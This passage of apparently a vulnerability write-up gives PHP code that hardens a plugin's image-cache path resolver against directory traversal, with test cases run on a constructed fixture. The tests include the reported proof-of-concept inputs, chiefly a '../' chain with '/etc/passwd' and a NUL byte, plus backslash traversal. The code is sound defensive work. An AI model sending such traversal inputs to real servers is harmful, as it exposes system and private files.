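// Windows backslash case that validate_file() misses. Fixture and inputs
// are constructed.

// Returns the resolved file path when, and only when, it lies inside the
// cache root; null otherwise.
function safe_cache_path(string $cache_root, string $size, string $path): ?string {
    // NUL bytes: filesystem calls treat the string as ending there, which is
    // how "%00" in the PoC discards anything appended after $path.
    if (strpos($size, "\0") !== false || strpos($path, "\0") !== false) {
        return null;
    }
    // The size is a number the plugin chose; accept nothing else.
    if (!preg_match('/^[0-9]{1,4}$/', $size)) {
        return null;
    }
    // Refuse a ".." segment on either separator, so the Windows-only case
    // behind validate_file() is covered as well as the POSIX one.
    if (preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $path)) {
        return null;
    }
    // Final authority: resolve both sides and require a prefix match. This
    // also catches symlinks that point outside the tree.
    $root = realpath($cache_root);
    $full = realpath($cache_root . DIRECTORY_SEPARATOR . $size . DIRECTORY_SEPARATOR . $path);
    if ($root === false || $full === false) {
        return null;
    }
    if (strpos($full, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $full;
}

// Constructed fixture: cache/100/ok.jpg plus a file outside the cache that
// must never be reachable through the resolver.
function build_fixture(): string {
    $base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pictpress-' . bin2hex(random_bytes(4));
    mkdir("$base/cache/100", 0700, true);
    file_put_contents("$base/cache/100/ok.jpg", 'JPEG');
    file_put_contents("$base/secret.txt", 'outside the cache');
    return $base;
}

$base  = build_fixture();
$cache = "$base/cache";

$cases = [
    'legitimate'       => ['100', 'ok.jpg'],
    'PoC size + NUL'   => ['../../../../../../../../../../', "/etc/passwd\0"],
    'dotdot slash'     => ['100', '../../secret.txt'],
    'dotdot backslash' => ['100', '..\\..\\secret.txt'],
    'absolute path'    => ['100', $base . '/secret.txt'],
];
foreach ($cases as $label => [$size, $path]) {
    $r = safe_cache_path($cache, $size, $path);
    printf("%-17s -> %s\n", $label, $r === null ? 'rejected' : 'allowed: ' . $r);
}
```

Only the legitimate case resolves; the others are stopped by the NUL check, the size allow-list, the separator-agnostic ".." test, or the realpath() prefix comparison. Keeping the realpath() check last, after the cheaper syntactic ones, means a path that passes every pattern test still cannot escape the root.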